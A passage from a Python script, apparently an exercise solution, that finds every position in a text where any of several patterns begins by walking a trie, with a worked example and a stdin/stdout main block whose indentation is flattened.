                currentnode = tree[currentnode[symbol]]
                counter += 1
                if counter < len(text):
                    symbol = text[counter]
            else:
                break
return result
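# Worked example (added for illustration): with text "ACATA" and patterns ["AT", "A", "AG"],
# solve(text, 3, patterns) returns [0, 2, 4] -- every position where at least one pattern begins.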
if __name__ == "__main__":
text = sys.stdin.readline().strip ()
n = int (sys.stdin.readline().strip())
patterns = []
for i in range (n):
patterns += [sys.stdin.readline().strip()]
ans = solve(text, n, patterns)
sys.stdout.write (' '.join(map (str, ans)) + '\n')
|